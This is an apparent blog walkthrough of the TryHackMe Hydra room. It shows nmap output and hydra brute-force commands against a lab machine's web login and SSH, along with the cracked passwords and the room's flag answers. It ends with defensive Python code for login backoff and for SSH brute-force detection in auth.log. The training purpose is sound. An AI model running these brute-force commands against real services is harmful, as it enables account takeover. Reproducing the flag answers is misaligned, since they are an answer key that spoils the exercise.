progrez.cloud

Hydra - Tryhackme | Web | Easy

03 March 2021

Hydra

Learn about and use Hydra, a fast network logon cracker, to brute-force and obtain a website's credentials.


Task 1 # Hydra Introduction


What is Hydra?

Hydra is a brute-force online password cracking program; a quick system login password 'hacking' tool. We can use Hydra to run through a list and brute-force some authentication services. Imagine trying to manually guess someone's password on a particular service (SSH, web application form, FTP or SNMP) - we can use Hydra to run through a password list and speed this process up for us, determining the correct password. Hydra can brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.


For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220


This shows the importance of using a strong password: if your password is common, doesn't contain special characters and/or is not longer than 8 characters, it will be prone to being guessed. There are 100 million password lists containing common passwords, so when an out-of-the-box application uses an easy password to log in, make sure to change it from the default! Often CCTV cameras and web frameworks use admin:password as the default password, which is obviously not strong enough.


Installing Hydra


If you are using Kali Linux, Hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra


If you don't have Linux or the right desktop environment, you can deploy your own Kali Linux machine with all the needed security tools. You can even control the machine in your browser! Do this with our Kali room - https://tryhackme.com/room/kali


Read the above and have Hydra at the ready.


Task 2 # Using Hydra


Deploy the machine attached to this task, then navigate to http://10.10.31.75 (this machine can take up to 3 minutes to boot)


We run a port scan to see which ports are open.

┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -A -Pn 10.10.31.75
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:31 WIT
Nmap scan report for 10.10.31.75
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  2048 62:a1:59:0c:a0:44:62:52:66:89:34:5c:ed:ee:5f:6f (RSA)
|  256 2d:d9:a6:43:3d:3c:a0:b3:8a:ce:03:de:74:e1:c5:43 (ECDSA)
|_ 256 89:3f:e8:f4:a3:f9:c4:9e:9c:9d:ec:2c:33:a0:35:61 (ED25519)
80/tcp open http   Node.js Express framework
| http-title: Hydra Challenge
|_Requested resource was /login
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT      ADDRESS
1  344.54 ms 10.9.0.1
2  344.67 ms 10.10.31.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.24 seconds


Hydra Commands


The options we pass to Hydra depend on which service (protocol) we are attacking. For example, if we want to brute-force FTP with the username pengguna and the password list passlist.txt, we would use the following command: hydra -l pengguna -P passlist.txt ftp://10.10.31.75

For the purposes of this deployed machine, here are the commands to use Hydra on SSH and on a web form (POST method).

SSH

hydra -l <username> -P <full path to pass> 10.10.31.75 -t 4 ssh

-l = the username to log in as

-P = use a list of passwords

-t = sets the number of threads (parallel tasks) to use


Web POST Form


We can also use Hydra to brute-force web forms. You need to know which type of request the form makes - the GET or POST methods are normally used. You can use your browser's network tab (in the developer tools) to see the request type, or simply view the source code.

Below is an example Hydra command to brute-force a POST login form:

hydra -l <username> -P <wordlist> 10.10.31.75 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

-l = a single username

-P = indicates use of the following password list

http-post-form = indicates the type of form (POST)

/login = the URL of the login page

username = the form field where the username is entered

^USER^ = tells Hydra to use the username

password = the form field where the password is entered

^PASS^ = tells Hydra to use the password list supplied earlier

F=incorrect = the failure string: if this word appears on the response page, the login attempt failed


You should now have enough information to put this into practice and brute-force the credentials on the deployed machine yourself!


Use Hydra to brute-force molly's web password. What is flag 1?


┌─[cyber@cyber]─[~]
└──╼ $sudo hydra -l molly -P rockyou.txt 10.10.20.168 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-03 11:58:12
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.20.168:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "12345" - 2 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "password" - 4 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "iloveyou" - 5 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "princess" - 6 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "1234567" - 7 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "rockyou" - 8 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "12345678" - 9 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "abc123" - 10 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "nicole" - 11 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "daniel" - 12 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "babygirl" - 13 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "monkey" - 14 of 14344398 [child 13] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "lovely" - 15 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jessica" - 16 of 14344398 [child 15] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "654321" - 17 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "michael" - 18 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "ashley" - 19 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "qwerty" - 20 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "111111" - 21 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "iloveu" - 22 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "000000" - 23 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "michelle" - 24 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "tigger" - 25 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "sunshine" - 26 of 14344398 [child 13] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "chocolate" - 27 of 14344398 [child 15] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "password1" - 28 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "soccer" - 29 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "anthony" - 30 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "friends" - 31 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "butterfly" - 32 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "purple" - 33 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "angel" - 34 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jordan" - 35 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "liverpool" - 36 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "justin" - 37 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "loveme" - 38 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "fuckyou" - 39 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123123" - 40 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "football" - 41 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "secret" - 42 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "andrea" - 43 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "carlos" - 44 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jennifer" - 45 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "joshua" - 46 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "bubbles" - 47 of 14344398 [child 15] (0/0)
[80][http-post-form] host: 10.10.20.168  login: molly  password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-03 11:58:31

Log in through the web browser with:

username : molly 
password : sunshine

Answer = THM{2673a7dd116de68e85c48ec0b1f2612e}
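The run above reached the right password on attempt 26 in under 20 seconds because the login form evaluates every guess it receives. The following is an added example, not part of the original walkthrough or of the lab application: a per-account progressive delay, replayed on a simulated clock against the first 26 guesses shown in the Hydra output. The class name, the delay parameters and the rate of one guess every 0.5 seconds are assumptions made for illustration.

```python
import time

class LoginBackoff:
    """Per-account progressive delay: after `free` failures, each further
    failure doubles the wait before another attempt is evaluated."""

    def __init__(self, free=3, base_s=2.0, cap_s=900.0, clock=time.monotonic):
        self.free, self.base_s, self.cap_s, self.clock = free, base_s, cap_s, clock
        self.state = {}                 # username -> (failure_count, locked_until)

    def retry_after(self, username):
        """Seconds the caller must still wait; 0 means the attempt may proceed."""
        _, locked_until = self.state.get(username, (0, 0.0))
        return max(0.0, locked_until - self.clock())

    def record_failure(self, username):
        count = self.state.get(username, (0, 0.0))[0] + 1
        delay = 0.0
        if count > self.free:
            delay = min(self.cap_s, self.base_s * 2 ** (count - self.free - 1))
        self.state[username] = (count, self.clock() + delay)

    def record_success(self, username):
        self.state.pop(username, None)


def replay(guesses, real_password, free=3, interval_s=0.5, username="molly"):
    """Replay guesses at a fixed rate on a simulated clock. Returns the guesses
    that reached the password comparison and whether one of them matched."""
    now = [0.0]
    guard = LoginBackoff(free=free, clock=lambda: now[0])
    evaluated = []
    for guess in guesses:
        now[0] += interval_s
        if guard.retry_after(username) > 0:
            continue                    # rejected (e.g. HTTP 429) without checking the password
        evaluated.append(guess)
        if guess == real_password:
            guard.record_success(username)
            return evaluated, True
        guard.record_failure(username)
    return evaluated, False

# The first 26 guesses from the Hydra output above, in the order they were tried.
GUESSES = ["123456", "12345", "123456789", "password", "iloveyou", "princess", "1234567",
           "rockyou", "12345678", "abc123", "nicole", "daniel", "babygirl", "monkey",
           "lovely", "jessica", "654321", "michael", "ashley", "qwerty", "111111",
           "iloveu", "000000", "michelle", "tigger", "sunshine"]
```

With three free failures and a 2-second base delay, only six of the 26 guesses are ever compared and the correct one is not among them. A delay keyed only on the account can also be used to keep the real user out, so it is normally paired with per-source limits.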


Use Hydra to brute-force molly's SSH password. What is flag 2?

┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo hydra -l molly -P rockyou.txt 10.10.20.168 -t 16 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-03 12:12:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.20.168:22/
[22][ssh] host: 10.10.20.168  login: molly  password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-03 12:12:37


Once the password has been found, log in over SSH.

┌─[cyber@cyber]─[~]
└──╼ $sudo ssh molly@10.10.20.168 -p 22 
The authenticity of host '10.10.20.168 (10.10.20.168)' can't be established.
ECDSA key fingerprint is SHA256:z7EuqBD03AFDbihpw7yKCZGXvkqfj0tkjG6H/J7ng10.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.20.168' (ECDSA) to the list of known hosts.
molly@10.10.20.168's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)

 * Documentation: https://help.ubuntu.com
 * Management:    https://landscape.canonical.com
 * Support:       https://ubuntu.com/advantage

65 packages can be updated.
32 updates are security updates.


Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-20-168:~$ ls
flag2.txt
molly@ip-10-10-20-168:~$ cat flag2.txt 
THM{c8eeb0468febbadea859baeb33b2541b}
molly@ip-10-10-20-168:~$ Connection to 10.10.20.168 closed by remote host.
Connection to 10.10.20.168 closed.

Answer = THM{c8eeb0468febbadea859baeb33b2541b}
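On the server side, the SSH run above shows up in the OpenSSH authentication log as a burst of failed password attempts from one source followed by an accepted login. The following is an added example, not part of the original walkthrough: detection logic over log lines in OpenSSH's auth.log format. The sample lines, the source addresses, the threshold and the window are constructed for illustration and were not captured from the lab machine.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches OpenSSH password-auth results as written to auth.log.
AUTH_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect(lines, threshold=5, window=timedelta(seconds=60), year=2021):
    """Return alerts in log order: ('bruteforce', ip, user) when one source reaches
    `threshold` failures inside `window`, and ('success_after_bruteforce', ip, user)
    when a source that was flagged then authenticates successfully."""
    recent = defaultdict(deque)         # ip -> timestamps of its recent failures
    flagged, alerts = set(), []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied by the caller
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        result, user, ip = m.group(2), m.group(3), m.group(4)
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, user))
    return alerts

# Constructed sample: six failures from one source, one unrelated failure, then a success.
SAMPLE = [f"Mar  3 12:12:{s} ip-10-10-20-168 sshd[2100]: Failed password for molly "
          f"from 10.9.0.2 port 44100 ssh2" for s in range(28, 34)]
SAMPLE += [
    "Mar  3 12:12:34 ip-10-10-20-168 sshd[2101]: Failed password for invalid user bob "
    "from 10.9.0.7 port 50022 ssh2",
    "Mar  3 12:12:37 ip-10-10-20-168 sshd[2100]: Accepted password for molly "
    "from 10.9.0.2 port 44100 ssh2",
]
```

The second alert type is the one to escalate: it means a guessed password worked, so the account's credentials need to be reset and its session reviewed.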